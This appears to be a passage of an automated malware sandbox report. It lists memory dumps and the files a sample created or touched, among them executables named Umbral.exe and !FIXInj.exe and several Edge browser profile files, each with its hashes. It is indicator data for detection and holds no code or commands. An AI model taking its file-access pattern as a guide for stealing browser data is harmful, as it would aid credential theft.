SHA256 0636e8f9816b17d7cff26ef5d280ce1c1aae992cda8165c6f4574029258a08a9
SHA512 f5166a295bb0960e59c176eefa89c341563fdf0eec23a45576e0ee5bf7e8271cc35eb9dd56b11d9c0bbe789f2eac112643108c46be3341fa332cfcf39b4a90b9

memory/4092-3619-0x0000000000010000-0x000000000005A000-memory.dmp

memory/1612-3632-0x0000000000BA0000-0x0000000000BAA000-memory.dmp

memory/1612-3641-0x0000000002DD0000-0x0000000002DDA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Umbral.exe

MD5 9694195bfd2d5a2d219c548d8dc65cf0
SHA1 d1113d97bb1114025e9260e898f3a3048a5a6fda
SHA256 c58b3fa42e404b4a095ee2959a7975b392d7d6b6af6e4d11c1431e3a430dfb6e
SHA512 24bb0f6432b221fe621d81a1c730bd473e9c295aa66a2b50cbe670ad2260f942a915f7f9aef65e6dc28320b8208fc712d9bfdc43dbc1a607ed9393bb5c17051a

memory/6872-3645-0x00000210F5B00000-0x00000210F5B40000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe

MD5 ad8378c96a922dcfe813935d1eec9ae4
SHA1 0e7ee31880298190258f5282f6cc2797fccdc134
SHA256 9a7b8171f8c6bd4bb61b7d8baf7dab921983ab7767705c3f1e1265704599ab98
SHA512 d38a7581ef5c3dcc8752fc2465ad698605bbd38bf380201623265e5ef121510d3f34116438727e60b3832e867e2ed4fd52081d58690690ff98b28cde80f6af5f

memory/2216-3689-0x0000000000400000-0x000000000083E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 de94da9f218e18936aee6923c483ec3c
SHA1 d318589bd595e7a1b6a8106e88f62ac2dc6870bc
SHA256 2abf7d7032d6d940ed1cdd0a2b312b4fd0a5f1e2c5181174c3f8df21605e0671
SHA512 ccc2fa1abd53384e0888077f4eec4539bd27bb179244d6e033b4857c30fa61a598776352970f00dd06d64fbf8b9e3823341abdb0cda6f4de7b4281a474c5f238

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 8cb9cdb1a0aec7a26ee723b6c3174342
SHA1 353507cb03e4491ad8c2dce16e4cd65bbcb6097c
SHA256 6151c8640f23b0b66c005a179cfbd983a1db47e9f6b025b589695223d4a37e6f
SHA512 7d7db664ac2e858465be26d9d50d9f986073777d75a5b42def466dcfcf55ec75d885f2576347e2c0d5621924867d3f648e4c11086efb2a4d41d239793dca09f4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 94185dcdbe0dcb09cbd067f6b8354797
SHA1 d79a8feb340e5f88c1a7af2c2132dfc8b38e64b4
SHA256 748216e0f767f83c80798867c992d755e68424d75ec66dcd9a56cab8bce410ca
SHA512 f43bcd527909a78d75bd95000862d30775dcde3820c137fdaf58ecd39238ff33aac05575e999a3b4727ec7dcd33596d343c7bf749779a791238d38c0d4b3bbd0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 fc515bfc60adba798695e516dbf80ef1
SHA1 6dc4722092af19a95e4d5a7b64dca9afc2ad30ad
SHA256 869b6e72ce52552fd50b7144ae06a81c389273f76f92cd08c1475514f516433d
SHA512 588d583a1ed21f03be83ca339eafa4339aca22b0c3bfe0ad9fbe44bec6ae20c0e82210f07476926ae29cfb24ad7ca482e9e7282a99c67efe80dc7bd0762abdc4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 012c8fb85ef425d969add6fe54956ee1
SHA1 bf8c6c22bb5cea896677e2a6122b23c7621a8b40
SHA256 e700633039dbf7ced1b0e9d5aac030326597c46185589b1fd7108c851dd4f3e6
SHA512 3331f6ca572e2439398070ddc26498aeb00c282d29ee584db0659ab4c482965e2d07ab5fcd2f9228bcc58f0bbce2ee70d3a36a3002cf70fde6c010af4a0b14a5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 b880b2918099acb956d03f5639082e85
SHA1 8bd0d345a73f3a8ba6cc581213fff13dad197e14
SHA256 da6abdb948d5fabd29a6322ba79e37dc0f720b4a7794cc0c86b05db20d236108
SHA512 cb7548b4d717c77b68e71bd393dc8a16d6f362cabb3e5c48cae88987dc681e555a2703e6c02f313b33dc61256d28d71cb4af4ca8c85fd2baa14e5dc6f6eab28f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 452c0a6a8d36fcf032ac9cd058742275
SHA1 b301b125f82b3089b6daa9b8fc44356cc4ca582f
SHA256 154355b51edc5b84a9868120520494759e10b3831dec20235f541829d89dac4c
SHA512 6bc02baf11af203867a590ec47ea02c4ef787648229ec80305f605bf29b65e33e6672b8d1c7b025049231a1ddd8353ba6ad22b9ddebed3b99d081ccc5ae0d89a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 45607a0ea7364556bb3b7a9ab8818f25
SHA1 74b42a95efedfdf83dced49d9f8a786a2585efc3
SHA256 49bc7778e156d634b4ff2b6e95bcd03942e565645a39e5d2736be7b453b95daa
SHA512 6b76cbb6ac171e99e8e5b8a15c4cc7aa9c22a517c2e7e459e25614b9f0401dd952a235b6006131273908743717466c1b29740d3f10e52be98677e1fbf8410c53

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 311cf6edb71cc2358054f0d3497e99ad
SHA1 29c385e7be7b73221b1326b5fc37df298869bd8c
SHA256 a3865ec0575be3883a1cea9d041ccb78fe7cccc9cae2711f2016a438030cf50f
SHA512 fa5ef698d1b3eee17c74ce7f00ad90f36ea50362e40926c6c4f6ca1719585cd6d77bbe5347f1f47150b3c8ee4348f9711cf52cc54337ea534a4df016331629a3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 4ad0590f28cead0eec1a579bb9bfae93
SHA1 a567c1bc58e9c81a1715afe776acb6b366659b96
SHA256 27d39d9553a2693f8c96a03fb446b22dcf527df7abf518548aff36258caf0f06
SHA512 e03b9e7e4b74337370b2f90d75d6e31bbc01c88d7e9cf92fab042c8add66c0b63f2a613f67f37e044ecbb521785e3fe30814b6e2264d93caa397744b6fcc4f14

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7a0353f32b160563acb1180333297dbb
SHA1 ebd3e70cadd0cfff78db79e047ff33b9a69662f3
SHA256 e5771b33d3f3c49cde150d20722dfba1a16217279ad37a60517afd0a0d19f2bd
SHA512 41fabcd74409152f5b7a0f8c738a23596cac5022cc3773dc2955e8e7f316c6df1b7b221d630bd72f69c594dd911646a727948cf2d01a6e08e3166d4d3a61f683

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 2a444e363dbc5abd014873bdd56ee4d6
SHA1 fd8535d3abdc749ece96eb41e61cfea09492ec5b
SHA256 dbca54d8fd7e8536c51e292d0c5c86f229e5a79dd2d32c3ae75b2ffc009d4eec
SHA512 268f658b91eddc998d4b3b3ae204d9ae34bd115f441569cc510f1ff09f81acb2da4c57f9de9f85168da053fa76abef31cbcb27479e9c141290ed933715ed4d90

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 bc6b17810062a00aa5423831f7c2d5e7
SHA1 dd1a19da6d3fae5b2f33f80ce2ed933c593faa0f
SHA256 b2a10d0a0f95fc126c42bb4b4627283934d3e8b37eb8746e72d3f2e5d695e0dd
SHA512 ba51faeab4bb0fb6f02e3cfdeb72683066fe1262e89f4b79e895ee78c8642c8f4cd774990f4b147f4dd1b71b9fa1db5cbcb9c4271df1f81bfac64029e4756b47

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 420aeac16f39ea0f50bb4fedffdc8bdd
SHA1 d703375e127c02bb57ea5c73758e53b440eff01c
SHA256 19c4aa5823cdb68cc8f63208f0e03ade76078b6738c14e0aaa265428526699f7
SHA512 6971925b03831118e889304e200e74090f4108040efe9d594a2bdb6c50a34413cb233110ae1a6c316191aa0fc8c9102ab6aba879fb6ccd7cf75594c571cad52e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index

MD5 dce17b09e6e3fe92e5a1f753e57a4fbe
SHA1 77777e206f6aca53962ab094d0f724a0901d1fd6
SHA256 42edd602da277c06b7e40e235b45e0db988812c2be86f18f58a7f3d9dae698b0
SHA512 43723f058eb2b7b8cffff1b613b185bacee93d1936fb034613d2e15be598d1058d6ba8469fc5c7ec52b846586c69b51317c6916b468709935b08286422e6d08b